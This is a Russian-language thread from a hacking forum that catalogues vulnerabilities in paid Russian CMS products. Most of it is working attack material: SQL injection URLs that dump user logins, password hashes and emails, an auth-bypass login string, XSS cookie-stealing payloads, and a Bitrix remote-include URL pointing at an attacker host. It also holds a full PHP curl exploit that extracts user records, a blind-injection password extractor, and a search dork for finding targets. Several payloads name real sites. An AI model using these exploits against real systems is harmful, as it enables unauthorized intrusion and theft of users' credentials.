Форум АНТИЧАТ - Обзор уязвимостей в платных CMS

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Обзор уязвимостей в платных CMS (https://forum.antichat.xyz/showthread.php?t=58123)

Обзор уязвимостей в платных Cms

VistaCMS

Оф.сайт: http://www.vistacms.ru
Стоимость (в руб.): 13000-42000 o.O
------------------------------------------------
Раскрытие путей:

http://www.vistacms.ru/modules/kerne'l/

Код:

/usr/home/admin/domains/vistacms.ru/public_html/class/page.class.php

SQL-injection

Администраторская панель:

Код:

http://www.vistacms.ru/admin/

Логин: 1' or 1=1/*
Пароль: antichat.ru

Клиенты:

Код:

http://www.vistacms.ru/clients/

Автор: ZAMUT (c)

P.S.
Уязвимость в авторизации, была замечена не везде. С чем это связано не знаю, про версию CMS ничего не говориться.

UMI.CMS

Оф.сайт: www.umi-cms.ru
Стоимость (в руб.): 2990-29990
------------------------------------------
XSS(Активная)

Настройки ->

Уязвимые поля:
Фамилия
Имя
Отчество

Код:

<script>alert(document.cookie)</script>

Автор: ZAMUT (c)

Уязвимость (sql-inj) обнаружена мной в ?модуле статистики? движка ABO CMS, файл c.php находится обычно в корне веб-директории сайта, реально заюзать уязвимость можно в MySQL 4.1 и выше, так как в более ранних версиях нет возможности использовать подзапросы...

цена ABO CMS на офф. сайте достигает 30000 рублей.
На этом движке работают крупные инет-магазины, банки, и т.д.

вот сплоит ТУТ написанный на php для получения логина и хеша пароля первого пользователя... для получения других данных скрипт не сложно модифицировать...
Скрипт написан немного корявенько, т.к. писался на скорую руку, так что больно не бейте

S.Builder
Разработчик CMS CBS-Group
Номер версии S.Builder 3.756
Лицензия платная
Сайт www.sbuilder.ru
Демо-версия www.demo.sbuilder.ru
Функциональность портал
Стоимость (в руб.) от 2235 до 44700 руб.

для теста в вебе создают акк на сутки

SQL-injection

20 полей

Цитата:

http://cmssite/more.php?bc_tovar_id=2+order+by+20/*'

Цитата:

http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a3a,version(),user(),databa se()),10,11,12,13,14,15,16,17,18,19,20/*'

системная инфа
5.0.22- log::dmsb_d7494517@localhost::dmsb_d7494517

Цитата:

http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a3a,table_schema,table_name ),10,11,12,13,14,15,16,17,18,19,20+from+informatio n_schema.tables/*'

пользователи

Цитата:

http://cmssite/more.php?bc_tovar_id=2+limit+0+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ binn_users/*'

название не смотрел ;) но мона через базу глянуть

VDNH
Оф. сайт http://www.vdnh.ru/
Лицензия - платная
Стоимость- от 6750- 176625
уязвимость - xss активная, пассивная
<script>alert('helloworld')</script>
также бажные у них гостевые книги.

Уязвимости в Bitrix CMS

Multiple Vulns in Bitrix CMS

Версия системы и история обновления

Vulnerable: Bitrix Site Manager 4.1.x

Exploit:

Код:

http://www.bitrix.ru/bitrix/updates/updater.log

XSS в редиректе:

Уязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу.

Раскрытие пути

Vulnerable: Bitrix Site Manager 4.0.x

Exploit:

Код:

http://host/bitrix/templates/.default/subscribe/subscr_form.php 

http://host /bitrix/php_interface/dbquery_error.php

PHP Include

Vulnerable: Bitrix Site Manager 4.0.x

Exploit:

Код:

http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/

"http://attackhost/" должен содержать скрипт dbconn.php в /bitrix/php_interface/

Amiro.CMS

сайт: amiro.ru

XSS (passive)

Сплоентс:

Код:

/saleoffset=saleoffset=<script>alert(document.cookie)</script>

Код:

/blabla<script>alert(document.cookie)</script>

by me +)

Mix Systems
vendor:http://mixsystems.com.ua

price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е."

SQL injection

plugin:katalog
EX

Код:

http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'

http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+order+by+18/*

http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

Код:

version::user::database

http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

users id::login::pwd::email

http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users/*

http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/*

plugin=photogall
Ex

Код:

http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11

http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+order+by+12/*&cat=11

Код:

version::user::database

http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11

users id::login::pwd::email

http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11

написал сплоит на CURL /*быстрее чем сокеты*/

PHP код:


		
			
<?



echo "\n";

echo "-------------------------Mix Systems CMS--------------------------"."\n";

echo "-----------------------coded by : halkfild------------------------"."\n";

echo "------------------------------------------------------------------"."\n";



if ($argc!=4){

  echo " Usage:    php ".$argv[0]." host type num_records\n";

  echo " host:    Your target ex www.target.com \n";

  echo " type:    1 - plugin=katalog bug\n";

  echo "        2 - plugin=photogall bug\n";

  echo " num_records: number or returned records(if 0 - return all)\n";

  echo " example: php script.php site.com 10\n";           

  echo "\n";

exit;

}



$host=$argv[1];

$type=$argv[2];

$count=$argv[3];



if ($argv[2]==1) {

  $query="index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+";

  $end=",1/*";

}

elseif ($argv[2]==2) {

  $query="index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),5,6,7,8,9,10,11,12+from+ng_users+limit+";

  $end=",1/*&cat=11";

}

else {

  echo " incorrect parameter #2=".$argv[2]."\n";

  echo " type:    1 - plugin=katalog bug\n";

  echo "        2 - plugin=photogall bug\n";

  exit;

}

$site=$host.'/'.$query;

$pattern='/@::(\d+)::(.*)::([0-9a-z]{32})::(.*@.*)::@/';

$i=0;

  

if(function_exists('curl_init'))

{

  while(1) {

    $ch = curl_init("http://".$site.$i.$end);

   

    curl_setopt($ch, CURLOPT_HEADER,true);

    curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);

    curl_setopt($ch, CURLOPT_TIMEOUT,10);

    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");  

    $res=curl_exec($ch);

    $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);

    curl_close($ch);

    if ($returncode==404) exit ("Vulnerable script not found. Check your site and settings :| \n");

  

    if(preg_match_all($pattern,$res,$out)) {

        echo "| ".$out[1][0]." | ".$out[2][0]." | ".$out[3][0]." | ".$out[4][0]." |\r\n";

        $i++;

        $out=null;

    }

    else break;

    

    if ($count!=0 && $i>$count) break;

     }

     echo ("Finish. /* ".$i." records*/ \n");

}

else

exit("Error:Libcurl isnt installed \n");



?>

ExpiCMS
www.expi-cms.ru
стоимость
1. Лицензия 1 год - 6 900 руб.

2. Лицензия 3 года - 12 900 руб.

3. Неограниченная лицензия - 17 490 руб

Пассивная xss

вход в админку www.expi-cms.ru/cms/login.php

в логин и пароль вставляеем например такую конструкцию :)

</SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>

Цитата:

так например на marypoppinscafe.ru/cms/login.php выдает некотрую интересную информацию в частности User - mary_poppins DataBase - cms_express_oksana_mary_poppins

SQL inj в Shop-Script

Shop-Script
Разработчик Articus dev. group
Лицензия платная
Сайт www.shop-script.ru/
Демо-версия www.demo.shop-script.ru/premium
Функциональность e-магазин
Стоимость (в руб.) от 0 до 5450 руб.

SQL injection

уязвимый скрипт invoice_phys.php
уязвимый парамерт order_time=
данные передаются кодированные в base64; возможен только посимвольный перебор
Пример уязвимого куска кода:

PHP код:


		
			
$_GET["orderID"] = (int) $_GET["orderID"];

$sql = 'SELECT COUNT(*) FROM '.ORDERS_TABLE.'

WHERE orderID='.$_GET["orderID"].' AND

order_time="'.base64_decode($_GET["order_time"]).'" AND 

customer_email="'.base64_decode($_GET["customer_email"]).'"';

Пример:

Код:

2008-03-16 14:24:11" or 1=1/*

Рабочий "код":

Код:

2008-03-16 14:24:11" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*

который нужно прогнать через base64_encode и передать скрипту.
Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде

Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dye s%22
Приблизительно 1500 стр...
Рабочий скрипт для подбора пароля __http://rapidshare.com/files/100018966/SS_brute.rar.html

Уязвимость не где не вылаживал, античат первый))